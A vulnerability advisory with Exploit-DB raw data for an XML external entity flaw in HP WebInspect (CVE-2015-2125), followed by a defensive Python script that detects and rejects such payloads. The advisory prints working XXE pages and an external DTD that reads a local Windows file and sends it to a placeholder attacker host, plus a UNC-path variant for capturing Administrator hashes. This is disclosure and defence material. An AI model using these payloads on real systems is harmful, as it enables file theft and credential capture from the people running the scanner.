Vendor: WebInspect
By: Jakub Palaczynski
CVSS: 7.5 (HIGH)
CWE: 611 (XML External Entity)
Product Name: WebInspect
Affected Version From: 10.4
Affected Version To: 7.x
Patch Exists: YES
Related CWE: CVE-2015-2125
CPE: a:hewlett_packard:webinspect
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2015

HP WebInspect – XML External Entity

A website was created that exploits the vulnerability using an out-of-band (OOB) technique. The website contains a hidden input field whose value is an XML document declaring an external parameter entity. That entity references a file on the attacker's host, and this file in turn specifies which local file should be retrieved from the scanning host and where the content of that file should be sent. A second website was created that steals hashes of the Administrator user; for this variant the attacker needs to run a tool on the server that captures the hashes. The exploit is triggered when a vulnerable version of HP WebInspect profiles or scans the crafted application.

Mitigation:

Upgrade to the latest version of HP WebInspect to mitigate this vulnerability.

Exploit-DB raw data:

# Exploit Title: HP WebInspect - XML External Entity
# Date: 23\04\2015
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.hp.com/
# Version: 10.4, 10.3, 10.2, 10.1, 10.0, 9.x, 8.x, 7.x
# CVE : CVE-2015-2125

1. Create a website that exploits the vulnerability.

1.1. Website that steals files using OOB technique:
1.1.1. Website that triggers vulnerability:
<html>
<body>

<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>

</body>
</html>
1.1.2. file.xml, served on the attacker's host. This file specifies which file should be retrieved from the remote host and where the content of that file should be sent:
<!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">

<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://attacker/?p=%payl;'>">

1.2. Website that steals hashes of Administrator user:
1.2.1. Website that triggers vulnerability:
<html>
<body>

<form action="/" method="POST">
<input type="hidden" name="payload" value='<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'/>
<input type="submit" value="Submit" />
</form>

</body>
</html>
1.2.2. The attacker needs to start a tool on the server that captures hashes.

2. The exploit is triggered while profiling or scanning the created application using vulnerable versions of HP WebInspect.
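As an added, defender-side example (it is not part of the advisory and not code from HP or WebInspect), the following Python script shows what a pre-parse gate for untrusted XML has to catch in the two payloads above: it decodes the hidden-field values exactly as the page shows them (the form encoding is what lets the `%` of a parameter-entity reference survive inside an HTML attribute), flags the DOCTYPE, the external parameter entities (HTTP URL, UNC path, file: URI) and the nested `&#37;` declaration inside file.xml, and refuses to parse any document that carries a DTD at all. All sample inputs are constructed copies of the page's own payloads; `attacker`, `file.xml` and the Windows path are the page's placeholders, and the function names are this example's own.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote_plus

# Constructed copies of the hidden-field values from the advisory, kept in the
# form-encoded shape the page shows ('+' for space, '%25' for '%').
OOB_FILE_PAYLOAD = r'<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"http://attacker/file.xml">%25remote;%25int;%25trick;]><tag></tag>'
UNC_PAYLOAD = r'<?xml+version="1.0"+encoding="utf-8"?><!DOCTYPE+m+[+<!ENTITY+%25+remote+SYSTEM+"\\attacker\path\file.txt">%25remote;]><tag></tag>'
# Constructed copy of the external DTD (file.xml) that the first payload fetches.
FILE_XML = (
    '<!ENTITY % payl SYSTEM "file:///C:/Windows/system.ini">\n'
    '<!ENTITY % int "<!ENTITY &#37; trick SYSTEM \'http://attacker/?p=%payl;\'>">\n'
)
# Constructed benign document for comparison.
BENIGN = '<?xml+version="1.0"?><tag>hello</tag>'

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY [%] name SYSTEM|PUBLIC "literal": an entity whose content comes from
# outside the document (for PUBLIC only the public identifier is captured here).
EXTERNAL_ENTITY_RE = re.compile(
    r'''<!ENTITY\s+(%\s*)?(\w+)\s+(SYSTEM|PUBLIC)\s+("[^"]*"|'[^']*')''', re.IGNORECASE
)
# An entity whose *value* contains another <!ENTITY declaration, i.e. the
# '&#37;' trick file.xml uses to build the exfiltration entity at parse time.
NESTED_ENTITY_RE = re.compile(
    r'''<!ENTITY\s+%?\s*\w+\s+("[^"]*<!ENTITY[^"]*"|'[^']*<!ENTITY[^']*')''', re.IGNORECASE
)


def decode_form_value(value: str) -> str:
    """Undo the form encoding of a hidden-field value ('+' -> space, '%XX' -> byte)."""
    return unquote_plus(value)


def find_xxe_indicators(xml_text: str) -> list[str]:
    """List the features that make this text unsafe for a DTD-aware parser."""
    findings = []
    if DOCTYPE_RE.search(xml_text):
        findings.append("doctype")
    for m in EXTERNAL_ENTITY_RE.finditer(xml_text):
        kind = "parameter-entity" if m.group(1) else "general-entity"
        target = m.group(4)[1:-1]  # drop the surrounding quotes
        lowered = target.lower()
        if lowered.startswith(("http://", "https://", "ftp://")):
            findings.append(f"{kind}:external-url:{target}")
        elif target.startswith("\\\\") or target.startswith("//"):
            # A UNC path makes the parsing host open an SMB connection (the hash-capture variant).
            findings.append(f"{kind}:unc-path:{target}")
        elif lowered.startswith("file:"):
            findings.append(f"{kind}:file-uri:{target}")
        else:
            findings.append(f"{kind}:other:{target}")
    if NESTED_ENTITY_RE.search(xml_text):
        findings.append("nested-entity-declaration")
    return findings


def safe_parse(xml_text: str) -> ET.Element:
    """Refuse any document that carries a DTD, then parse the rest normally."""
    if DOCTYPE_RE.search(xml_text):
        raise ValueError("DTD/DOCTYPE not allowed in untrusted XML")
    return ET.fromstring(xml_text)


if __name__ == "__main__":
    for label, form_value in [("oob-file", OOB_FILE_PAYLOAD), ("unc-hash", UNC_PAYLOAD), ("benign", BENIGN)]:
        print(label, find_xxe_indicators(decode_form_value(form_value)))
    print("file.xml", find_xxe_indicators(FILE_XML))
```

Rejecting on the presence of a DOCTYPE is the simplest robust rule: both payloads depend on the internal subset to declare their parameter entities, and file.xml only matters once the parser has been allowed to fetch it. The indicator list is there for logging and detection, so that a blocked request records which kind of entity it tried to declare.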